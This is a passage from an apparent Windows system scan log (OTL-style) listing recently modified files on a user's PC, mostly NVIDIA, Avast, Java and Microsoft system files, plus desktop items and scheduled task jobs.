C:\windows\SysWow64\WindowsAccessBridge-32.dll [2014-06-04 11:10:35 | 000,264,616 | ---- | M] (Oracle Corporation) -- C:\windows\SysWow64\javaws.exe [2014-06-04 11:10:35 | 000,175,528 | ---- | M] (Oracle Corporation) -- C:\windows\SysWow64\javaw.exe [2014-06-04 11:10:35 | 000,175,016 | ---- | M] (Oracle Corporation) -- C:\windows\SysWow64\java.exe [2014-06-04 11:07:21 | 000,001,041 | ---- | M] () -- C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sidebar383.lnk [2014-06-04 11:06:20 | 000,067,584 | --S- | M] () -- C:\windows\bootstat.dat [2014-06-03 22:00:00 | 000,001,062 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineCore.job [2014-06-03 20:12:48 | 002,598,395 | ---- | M] () -- C:\Users\Marcin\Desktop\Sid_Meiers_Pirates_pl.rar [2014-06-03 17:26:38 | 000,001,163 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk [2014-06-03 17:15:06 | 001,050,846 | ---- | M] () -- C:\windows\SysNative\perfh015.dat [2014-06-03 17:15:06 | 000,824,426 | ---- | M] () -- C:\windows\SysNative\perfh009.dat [2014-06-03 17:15:06 | 000,248,416 | ---- | M] () -- C:\windows\SysNative\perfc015.dat [2014-06-03 17:15:06 | 000,213,546 | ---- | M] () -- C:\windows\SysNative\perfc009.dat [2014-06-03 17:15:06 | 000,006,000 | ---- | M] () -- C:\windows\SysNative\PerfStringBackup.INI [2014-06-03 17:00:57 | 000,000,468 | -H-- | M] () -- C:\windows\tasks\SN.Booster-S-1532781606.job [2014-06-03 12:13:12 | 027,590,656 | ---- | M] () -- C:\windows\SysNative\vmguest.iso [2014-06-03 12:02:18 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys [2014-06-03 12:02:17 | 1622,085,630 | -HS- | M] () -- C:\hiberfil.sys [2014-06-02 21:29:20 | 000,000,541 | ---- | M] () -- C:\Users\Public\Desktop\Pirates of the Caribbean.lnk [2014-06-02 18:38:08 | 000,000,834 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk [2014-06-02 18:37:30 | 004,748,896 | ---- | M] (Piriform Ltd) -- C:\Users\Marcin\Desktop\ccsetup414.exe [2014-06-01 17:56:05 | 004,095,968 | ---- | M] () -- C:\Users\Marcin\Desktop\Opracowanie zagadnień.pdf [2014-05-30 08:39:13 | 000,021,734 | ---- | M] () -- C:\Users\Marcin\AppData\Local\recently-used.xbel [2014-05-30 01:07:51 | 001,291,232 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvspbridge.dll [2014-05-30 01:07:51 | 001,122,312 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvspcap.dll [2014-05-30 01:07:38 | 001,715,176 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvspbridge64.dll [2014-05-30 01:07:38 | 001,279,480 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvspcap64.dll [2014-05-29 19:08:27 | 000,223,186 | ---- | M] () -- C:\Users\Marcin\Desktop\przyklad.jpg [2014-05-26 15:27:10 | 001,039,096 | ---- | M] (AVAST Software) -- C:\windows\SysNative\drivers\aswsnx.sys [2014-05-26 15:27:10 | 000,423,240 | ---- | M] (AVAST Software) -- C:\windows\SysNative\drivers\aswsp.sys [2014-05-26 15:27:10 | 000,085,328 | ---- | M] (AVAST Software) -- C:\windows\SysNative\drivers\aswstm.sys [2014-05-26 15:26:37 | 001,039,096 | ---- | M] (AVAST Software) -- C:\windows\SysNative\drivers\aswsnx.sys.1401110830718 [2014-05-26 15:26:37 | 000,423,240 | ---- | M] (AVAST Software) -- C:\windows\SysNative\drivers\aswsp.sys.1401110830718 [2014-05-26 15:26:37 | 000,334,648 | ---- | M] (AVAST Software) -- C:\windows\SysNative\aswBoot.exe [2014-05-26 15:26:37 | 000,208,416 | ---- | M] () -- C:\windows\SysNative\drivers\aswVmm.sys [2014-05-26 15:26:37 | 000,093,568 | ---- | M] (AVAST Software) -- C:\windows\SysNative\drivers\aswRdr2.sys [2014-05-26 15:26:37 | 000,079,184 | ---- | M] (AVAST Software) -- C:\windows\SysNative\drivers\aswMonFlt.sys [2014-05-26 15:26:37 | 000,065,776 | ---- | M] () -- C:\windows\SysNative\drivers\aswRvrt.sys [2014-05-26 15:26:37 | 000,029,208 | ---- | M] () -- C:\windows\SysNative\drivers\aswHwid.sys [2014-05-26 15:26:35 | 000,043,152 | ---- | M] (AVAST Software) -- C:\windows\avastSS.scr [2014-05-23 10:39:14 | 000,000,246 | ---- | M] () -- C:\Users\Marcin\AppData\Roaming\Top Process Monitor_Settings.ini [2014-05-23 10:38:43 | 000,000,119 | ---- | M] () -- C:\Users\Marcin\AppData\Roaming\System Monitor II_UptimeRecord.ini [2014-05-23 10:37:45 | 000,000,006 | ---- | M] () -- C:\Users\Marcin\AppData\Roaming\Network Meter_Usage.ini [2014-05-23 10:37:30 | 000,000,119 | ---- | M] () -- C:\Users\Marcin\AppData\Roaming\Network Monitor II_Traffic.ini [2014-05-23 10:36:18 | 000,000,839 | ---- | M] () -- C:\Users\Marcin\AppData\Roaming\Drives Meter_Settings.ini [2014-05-23 10:35:01 | 000,000,092 | ---- | M] () -- C:\Users\Marcin\AppData\Roaming\Control System_Settings.ini [2014-05-23 10:19:12 | 000,000,285 | ---- | M] () -- C:\Users\Marcin\AppData\Roaming\GPU MeterV2_Settings.ini [2014-05-23 10:07:05 | 000,000,624 | ---- | M] () -- C:\Users\Marcin\AppData\Roaming\All CPU MeterV3_Settings.ini [2014-05-23 09:58:15 | 020,320,256 | ---- | M] () -- C:\Users\Marcin\Desktop\8GadgetPackSetup.msi [2014-05-22 18:08:10 | 000,061,112 | ---- | M] (StdLib) -- C:\windows\SysNative\drivers\{0c0bb4a8-45a4-4685-9c1d-08d98af4b926}w64.sys [2014-05-20 04:44:03 | 031,387,936 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvoglv64.dll [2014-05-20 04:44:03 | 025,256,224 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvcompiler.dll [2014-05-20 04:44:03 | 024,025,376 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvoglv32.dll [2014-05-20 04:44:03 | 018,531,568 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvwgf2umx.dll [2014-05-20 04:44:03 | 017,561,544 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvcompiler.dll [2014-05-20 04:44:03 | 017,480,432 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvd3dumx.dll [2014-05-20 04:44:03 | 016,003,912 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvwgf2um.dll [2014-05-20 04:44:03 | 014,434,704 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvd3dum.dll [2014-05-20 04:44:03 | 011,644,928 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvcuda.dll [2014-05-20 04:44:03 | 011,599,072 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvopencl.dll [2014-05-20 04:44:03 | 009,735,256 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvcuda.dll [2014-05-20 04:44:03 | 009,697,640 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvopencl.dll [2014-05-20 04:44:03 | 003,141,976 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvcuvid.dll [2014-05-20 04:44:03 | 003,109,248 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvapi64.dll [2014-05-20 04:44:03 | 002,953,672 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvcuvid.dll [2014-05-20 04:44:03 | 002,785,568 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvcuvenc.dll [2014-05-20 04:44:03 | 002,730,208 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvapi.dll [2014-05-20 04:44:03 | 002,412,376 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvcuvenc.dll [2014-05-20 04:44:03 | 001,889,112 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvdispco6433788.dll [2014-05-20 04:44:03 | 001,541,576 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvdispgenco6433788.dll [2014-05-20 04:44:03 | 000,952,952 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvumdshimx.dll [2014-05-20 04:44:03 | 000,895,776 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\NvIFR64.dll [2014-05-20 04:44:03 | 000,892,704 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\NvFBC64.dll [2014-05-20 04:44:03 | 000,867,784 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\NvIFR.dll [2014-05-20 04:44:03 | 000,861,128 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\NvFBC.dll [2014-05-20 04:44:03 | 000,837,056 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvumdshim.dll [2014-05-20 04:44:03 | 000,492,376 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvEncodeAPI64.dll [2014-05-20 04:44:03 | 000,416,712 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvEncodeAPI.dll [2014-05-20 04:44:03 | 000,382,240 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\NvIFROpenGL.dll [2014-05-20 04:44:03 | 000,354,016 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvoglshim64.dll [2014-05-20 04:44:03 | 000,335,704 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\NvIFROpenGL.dll [2014-05-20 04:44:03 | 000,305,600 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvoglshim32.dll [2014-05-20 04:44:03 | 000,166,568 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvinitx.dll [2014-05-20 04:44:03 | 000,146,480 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysWow64\nvinit.dll [2014-05-20 04:44:03 | 000,032,544 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\drivers\nvpciflt.sys [2014-05-20 04:44:03 | 000,026,069 | ---- | M] () -- C:\windows\SysNative\nvinfo.pb [2014-05-20 03:25:42 | 006,769,096 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvcpl.dll [2014-05-20 03:25:42 | 003,514,144 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvsvc64.dll [2014-05-20 03:25:38 | 002,560,968 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvsvcr.dll [2014-05-20 03:25:38 | 001,078,616 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nv3dappshext.dll [2014-05-20 03:25:38 | 000,387,528 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvmctray.dll [2014-05-20 03:25:38 | 000,076,064 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nv3dappshextr.dll [2014-05-20 03:25:38 | 000,062,808 | ---- | M] (NVIDIA Corporation) -- C:\windows\SysNative\nvshext.dll [2014-05-19 21:45:13 | 000,007,598 | ---- | M] () -- C:\Users\Marcin\AppData\Local\Resmon.ResmonCfg [2014-05-15 16:31:49 | 000,476,528 | ---- | M] () -- C:\windows\SysNative\FNTCACHE.DAT [2014-05-15 01:49:42 | 003,774,821 | ---- | M] () -- C:\windows\SysNative\nvcoproc.bin [2014-05-14 16:04:26 | 000,195,584 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\msrating.dll [2014-05-14 16:04:26 | 000,164,864 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\msrating.dll [2014-05-14 16:01:36 | 000,792,576 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\autochk.exe [2014-05-14 16:01:36 | 000,350,720 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\srchadmin.dll [2014-05-14 16:01:36 | 000,082,432 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\IdCtrls.dll [2014-05-14 16:01:35 | 005,784,064 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\jscript9.dll [2014-05-14 16:01:35 | 000,752,640 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\jscript9diag.dll [2014-05-14 16:01:35 | 000,576,512 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SettingSync.dll [2014-05-14 16:01:35 | 000,112,640 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\DAMM.dll [2014-05-14 16:01:35 | 000,092,672 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dafBth.dll [2014-05-14 16:01:35 | 000,059,392 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Networking.Sockets.PushEnabledApplication.dll [2014-05-14 16:01:35 | 000,032,768 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\iernonce.dll [2014-05-14 16:01:34 | 000,610,304 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\sud.dll [2014-05-14 16:01:34 | 000,559,104 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\UserLanguagesCpl.dll [2014-05-14 16:01:34 | 000,140,800 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SkyDriveShell.dll [2014-05-14 16:01:32 | 002,428,928 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\ExplorerFrame.dll [2014-05-14 16:01:32 | 001,621,504 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\RacEngn.dll [2014-05-14 16:01:30 | 011,742,720 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\glcndFilter.dll [2014-05-14 16:01:30 | 000,690,688 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\MrmIndexer.dll [2014-05-14 16:01:30 | 000,630,784 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\OobeFldr.dll [2014-05-14 16:01:30 | 000,591,872 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\aepdu.dll [2014-05-14 16:01:30 | 000,527,360 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\aeinv.dll [2014-05-14 16:01:30 | 000,385,024 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\devinv.dll [2014-05-14 16:01:30 | 000,183,808 | ---- | M] (Microsoft Corp.) -- C:\windows\SysNative\Defrag.exe [2014-05-14 16:01:30 | 000,148,992 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\sppnp.dll [2014-05-14 16:01:30 | 000,128,512 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\microsoft-windows-kernel-power-events.dll [2014-05-14 16:01:30 | 000,109,568 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dwm.exe [2014-05-14 16:01:30 | 000,109,568 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\CloudStorageWizard.exe [2014-05-14 16:01:30 | 000,095,744 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\aepic.dll [2014-05-14 16:01:29 | 000,123,904 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\LockScreenContent.dll [2014-05-14 16:01:29 | 000,059,392 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ConfigureExpandedStorage.dll [2014-05-14 16:01:28 | 001,136,128 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\wscui.cpl [2014-05-14 16:01:28 | 000,315,904 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\synthstor.dll [2014-05-14 16:01:28 | 000,136,192 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\psmsrv.dll [2014-05-14 16:01:28 | 000,109,568 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\wscinterop.dll [2014-05-14 16:01:28 | 000,106,496 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\setupugc.exe [2014-05-14 16:01:28 | 000,032,256 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\JavaScriptCollectionAgent.dll [2014-05-14 16:01:27 | 000,968,704 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\tdh.dll [2014-05-14 16:01:27 | 000,111,616 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ieetwcollector.exe [2014-05-14 16:01:27 | 000,048,640 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ieetwproxystub.dll [2014-05-14 16:01:27 | 000,004,096 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ieetwcollectorres.dll [2014-05-14 16:01:26 | 008,874,496 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Data.Pdf.dll [2014-05-14 16:01:25 | 000,655,360 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\cscui.dll [2014-05-14 16:01:25 | 000,071,888 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\dumpfve.sys [2014-05-14 16:01:25 | 000,030,208 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SettingSyncPolicy.dll [2014-05-14 16:01:24 | 000,997,888 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\reseteng.dll [2014-05-14 16:01:24 | 000,188,464 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\systemreset.exe [2014-05-14 16:01:24 | 000,050,053 | ---- | M] () -- C:\windows\SysNative\srms.dat [2014-05-14 16:01:24 | 000,027,480 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SysResetErr.exe [2014-05-14 16:01:20 | 000,399,872 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\das.dll [2014-05-14 16:01:20 | 000,092,160 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dasHost.exe [2014-05-14 16:01:20 | 000,055,296 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\AepRoam.dll [2014-05-14 16:01:20 | 000,038,400 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\deviceassociation.dll [2014-05-14 16:01:19 | 000,592,896 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\jscript9diag.dll [2014-05-14 16:01:19 | 000,488,960 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\winspool.drv [2014-05-14 16:01:18 | 000,747,008 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wlidcli.dll [2014-05-14 16:01:17 | 000,630,272 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\OobeFldr.dll [2014-05-14 16:01:17 | 000,269,312 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\PlayToDevice.dll [2014-05-14 16:01:16 | 000,388,408 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\bcryptprimitives.dll [2014-05-14 16:01:14 | 000,391,008 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\MMDevAPI.dll [2014-05-14 16:01:14 | 000,135,168 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\fsutil.exe [2014-05-14 16:01:14 | 000,100,197 | ---- | M] () -- C:\windows\SysNative\RacRules.xml [2014-05-14 16:01:14 | 000,027,136 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\LockScreenContentHost.dll [2014-05-14 16:01:12 | 000,647,168 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SettingSyncHost.exe [2014-05-14 16:01:12 | 000,211,968 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\Dism.exe [2014-05-14 16:01:12 | 000,051,200 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\ieetwproxystub.dll [2014-05-14 16:01:10 | 000,832,512 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\ActionCenter.dll [2014-05-14 16:01:10 | 000,589,312 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\vdsdyn.dll [2014-05-14 16:01:10 | 000,232,896 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\sqmapi.dll [2014-05-14 16:01:10 | 000,165,376 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\bcdboot.exe [2014-05-14 16:01:10 | 000,127,488 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\occache.dll [2014-05-14 16:01:09 | 001,728,000 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dui70.dll [2014-05-14 16:01:09 | 001,356,360 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\winresume.exe [2014-05-14 16:01:09 | 000,116,736 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\pnpclean.dll [2014-05-14 16:01:08 | 002,165,760 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\SyncCenter.dll [2014-05-14 16:01:08 | 001,659,056 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\winload.efi [2014-05-14 16:01:08 | 001,519,592 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\winload.exe [2014-05-14 16:01:08 | 001,487,520 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\winresume.efi [2014-05-14 16:01:08 | 000,584,704 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\StructuredQuery.dll [2014-05-14 16:01:08 | 000,032,544 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\UserAccountBroker.exe [2014-05-14 16:01:07 | 000,292,864 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\ninput.dll [2014-05-14 16:01:07 | 000,209,160 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\imm32.dll [2014-05-14 16:01:07 | 000,083,120 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\taskhost.exe [2014-05-14 16:01:07 | 000,080,048 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\taskhostex.exe [2014-05-14 16:01:07 | 000,071,680 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\StorageContextHandler.dll [2014-05-14 16:01:07 | 000,015,872 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\slpts.dll [2014-05-14 16:01:06 | 000,152,064 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dwmredir.dll [2014-05-14 16:01:06 | 000,030,720 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\deviceassociation.dll [2014-05-14 16:01:04 | 002,100,736 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SystemSettingsAdminFlowUI.dll [2014-05-14 16:01:04 | 000,660,480 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Devices.Bluetooth.dll [2014-05-14 16:01:03 | 000,628,224 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\msTextPrediction.dll [2014-05-14 16:01:03 | 000,258,784 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SystemSettingsAdminFlows.exe [2014-05-14 16:01:03 | 000,208,896 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\PlayToManager.dll [2014-05-14 16:01:03 | 000,017,920 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\sxshared.dll [2014-05-14 16:01:02 | 000,551,424 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\wimgapi.dll [2014-05-14 16:01:02 | 000,544,768 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\wlidcli.dll [2014-05-14 16:01:02 | 000,424,280 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\hal.dll [2014-05-14 16:01:02 | 000,245,248 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\microsoft-windows-system-events.dll [2014-05-14 16:01:02 | 000,047,104 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\offreg.dll [2014-05-14 16:01:01 | 000,191,488 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\rpchttp.dll [2014-05-14 16:00:59 | 000,356,864 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\conhost.exe [2014-05-14 16:00:57 | 001,576,960 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wlidsvc.dll [2014-05-14 16:00:57 | 000,467,456 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\energy.dll [2014-05-14 16:00:56 | 000,053,248 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\acppage.dll [2014-05-14 16:00:55 | 001,428,480 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\RecoveryDrive.exe [2014-05-14 16:00:55 | 000,943,104 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\WlanMM.dll [2014-05-14 16:00:55 | 000,645,104 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SHCore.dll [2014-05-14 16:00:55 | 000,410,568 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\WerFault.exe [2014-05-14 16:00:55 | 000,369,288 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\Faultrep.dll [2014-05-14 16:00:55 | 000,033,056 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\WerFaultSecure.exe [2014-05-14 16:00:53 | 000,439,808 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Devices.Bluetooth.dll [2014-05-14 16:00:52 | 000,270,336 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\winsku.dll [2014-05-14 16:00:52 | 000,163,328 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\ocsetapi.dll [2014-05-14 16:00:52 | 000,139,264 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ieUnatt.exe [2014-05-14 16:00:52 | 000,082,944 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\spbcd.dll [2014-05-14 16:00:52 | 000,027,136 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\winbrand.dll [2014-05-14 16:00:51 | 000,924,504 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\refs.sys [2014-05-14 16:00:51 | 000,156,672 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\RelPost.exe [2014-05-14 16:00:51 | 000,098,304 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\netid.dll [2014-05-14 16:00:50 | 000,779,264 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\osk.exe [2014-05-14 16:00:50 | 000,473,600 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\AppxPackaging.dll [2014-05-14 16:00:50 | 000,173,056 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dmvdsitf.dll [2014-05-14 16:00:50 | 000,159,232 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\werui.dll [2014-05-14 16:00:50 | 000,051,200 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\DAConn.dll [2014-05-14 16:00:49 | 000,548,352 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\vbscript.dll [2014-05-14 16:00:49 | 000,413,184 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wow64win.dll [2014-05-14 16:00:49 | 000,076,288 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\BulkOperationHost.exe [2014-05-14 16:00:48 | 000,290,816 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\mdmregistration.dll [2014-05-14 16:00:48 | 000,207,872 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\dmdskmgr.dll [2014-05-14 16:00:48 | 000,141,824 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dot3mm.dll [2014-05-14 16:00:47 | 002,043,904 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\inetcpl.cpl [2014-05-14 16:00:46 | 000,189,784 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\UCX01000.SYS [2014-05-14 16:00:45 | 000,453,120 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dxtmsft.dll [2014-05-14 16:00:45 | 000,325,464 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\USBXHCI.SYS [2014-05-14 16:00:45 | 000,296,960 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dxtrans.dll [2014-05-14 16:00:44 | 000,127,488 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\migisol.dll [2014-05-14 16:00:44 | 000,045,568 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\acppage.dll [2014-05-14 16:00:44 | 000,038,680 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\LockScreenContentServer.exe [2014-05-14 16:00:43 | 000,089,848 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\ncryptsslp.dll [2014-05-14 16:00:42 | 000,052,736 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\AppxSysprep.dll [2014-05-14 16:00:41 | 001,290,688 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\msctf.dll [2014-05-14 16:00:41 | 000,245,248 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Networking.Vpn.dll [2014-05-14 16:00:41 | 000,057,344 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SrTasks.exe [2014-05-14 16:00:41 | 000,027,648 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\WofTasks.dll [2014-05-14 16:00:40 | 000,155,136 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SettingMonitor.dll [2014-05-14 16:00:40 | 000,112,128 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\ieUnatt.exe [2014-05-14 16:00:40 | 000,068,096 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\UXInit.dll [2014-05-14 16:00:40 | 